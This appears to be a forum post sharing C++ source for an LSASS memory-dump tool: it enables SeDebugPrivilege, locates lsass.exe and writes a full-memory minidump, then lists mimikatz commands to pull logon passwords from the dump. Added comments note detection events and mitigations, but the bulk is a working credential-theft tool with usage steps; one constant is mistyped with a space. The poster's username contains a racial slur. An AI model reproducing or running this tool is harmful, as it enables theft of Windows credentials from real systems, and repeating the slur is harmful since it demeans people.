Old 03-20-2025, 10:11 AM

lilbossnigga lilbossnigga is offline


Code:
//lsass mem dump
//
//coded by sasami_327
////////////////////////////////////////////////////////
#include <Windows.h>
#include <DbgHelp.h>
#include <stdio.h>
#include <TlHelp32.h>
#pragma comment(lib, "dbghelp")
// Expands to `::api`: the `dll` argument is ignored and the call resolves to
// the statically linked import in the global namespace. The `::` scope
// resolution operator means this listing is C++, not C.
#define CWA(dll, api) ::api
// Enables SeDebugPrivilege on the current process token.
// Returns TRUE only when OpenProcessToken, LookupPrivilegeValueA and
// AdjustTokenPrivileges all report success; each failure path prints
// GetLastError() and the token handle is closed on every path after it is
// opened.
// NOTE(review): AdjustTokenPrivileges returns nonzero even when the privilege
// could not be assigned (GetLastError() == ERROR_NOT_ALL_ASSIGNED); that case
// is not checked here, so TRUE does not prove the privilege is held.
// NOTE(defender): a token privilege adjustment is recorded as Security Event
// ID 4703 when the "Audit Token Right Adjusted" subcategory is enabled; a
// non-debugger process enabling SeDebugPrivilege is a useful hunting signal.
BOOL EnableSeDebugPrivilege(VOID)
{
HANDLE token = NULL;
LUID luid, *pluid;
TOKEN_PRIVILEGES tokenPriv, *ptokenPriv;
BOOL ret = FALSE;
// Token of the calling process, opened for privilege adjustment and query.
if ( CWA(kernel32, OpenProcessToken)(CWA(kernel32, GetCurrentProcess()), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &token) )
{
printf("Successfully OpenProcessToken\n");
pluid = &luid;
// Resolve the LUID for SeDebugPrivilege on the local system.
if ( CWA(kernel32, LookupPrivilegeValueA(NULL, "SeDebugPrivilege", pluid)) )
{
printf("Successfully LookupPrivilegeValueA\n");
ptokenPriv = &tokenPriv;
ptokenPriv->PrivilegeCount = 1;
ptokenPriv->Privileges[0].Luid = luid;
ptokenPriv->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Previous state is not requested (0, 0, NULL), so it cannot be restored.
if ( AdjustTokenPrivileges(token, FALSE, ptokenPriv, 0, 0, NULL) )
{
printf("Successfully AdjustTokenPrivileges\n");
ret = TRUE;
}
else
{
printf("Failed to AdjustTokenPrivileges with error=%d\n", GetLastError());
}
}
else
{
printf("Failed to LookupPrivilegeValueA with error=%d\n", GetLastError());
}
CWA(kernel32, CloseHandle)(token);
}
else
{
printf("Failed to OpenProcessToken with error=%d\n", GetLastError());
}
return(ret);
}
// Writes a full-memory minidump of process `pid` to "lsass.dmp" in the
// current working directory using MiniDumpWriteDump.
// Prints "OK" only on success; failures of OpenProcess, CreateFileA and
// MiniDumpWriteDump are silent (no GetLastError() output). Both handles are
// closed on every path after they are opened.
// NOTE(defender): opening lsass.exe with PROCESS_VM_READ and then calling
// MiniDumpWriteDump on it is the well-known LSASS credential-dump pattern.
// Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe and EDR
// cross-process-access telemetry alert on it, and LSA Protection (RunAsPPL)
// and Credential Guard are the platform mitigations designed to block it.
VOID dump(DWORD pid)
{
HANDLE process = NULL;
HANDLE file = NULL;
if ( ( process = CWA(kernel32, OpenProcess)(PROCESS_QUERY_INFORMATION|PROCESS_VM_ READ, FALSE, pid) ) )
{
// CREATE_ALWAYS: an existing "lsass.dmp" is overwritten; share mode 0.
if ( INVALID_HANDLE_VALUE != ( file = CWA(kernel32, CreateFileA)("lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) )
{
// MiniDumpWithFullMemory: the whole address space, not just stacks/modules.
if ( CWA(dbghelp, MiniDumpWriteDump)(
process,
pid,
file,
MiniDumpWithFullMemory,
NULL,
NULL,
NULL
) )
{
printf("OK\n");
}
CWA(kernel32, CloseHandle)(file);
}
CWA(kernel32, CloseHandle)(process);
}
}
// Walks a Toolhelp32 process snapshot and returns the th32ProcessID of the
// first entry whose szExeFile equals `procName` exactly (case-sensitive
// strcmp). Returns (DWORD)-1, i.e. 0xFFFFFFFF, when the snapshot cannot be
// taken or no entry matches.
// The loop terminates only on a match or when Process32Next fails with
// ERROR_NO_MORE_FILES; any other Process32Next failure leaves the same entry
// in place and the loop continues.
DWORD GetPIDByProcessName(char* procName)
{
DWORD retPID = -1;
PROCESSENTRY32 pEntry32, *ppEntry32;
HANDLE snapshot = NULL;
if ( INVALID_HANDLE_VALUE != (snapshot = CWA(kernel32, CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0)) )
{
ppEntry32 = &pEntry32;
// dwSize must be set before Process32First or the call fails.
ppEntry32->dwSize = sizeof(pEntry32);
if ( CWA(kernel32, Process32First(snapshot, ppEntry32)) )
{
for ( ; ; )
{
if ( !strcmp(procName, ppEntry32->szExeFile) )
{
retPID = ppEntry32->th32ProcessID;
break;
}
if ( !CWA(kernel32, Process32Next(snapshot, ppEntry32)) )
{
if ( ERROR_NO_MORE_FILES == GetLastError() )
{
break;
}
}
}
}
CWA(kernel32, CloseHandle)(snapshot);
}
return(retPID);
}
// Entry point: looks up lsass.exe by exact name, enables SeDebugPrivilege,
// then dumps it. argc/argv are unused; the exit code is always 0, including
// on failure.
// `-1 != lsass` compares against the (DWORD)-1 sentinel returned by
// GetPIDByProcessName; `%d` for a DWORD is a signed/unsigned format mismatch.
// NOTE(defender): the target name, output file name and privilege name are
// all hard-coded string literals ("lsass.exe", "lsass.dmp",
// "SeDebugPrivilege"), which makes a compiled binary straightforward to
// match with static AV/YARA rules alongside the DbgHelp import.
int main(int argc, char* argv[])
{
DWORD lsass = GetPIDByProcessName("lsass.exe");
if ( -1 != lsass )
{
printf("lsass=%d\n", lsass);
if ( EnableSeDebugPrivilege() )
{
dump(lsass);
}
}
return(0);
}

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
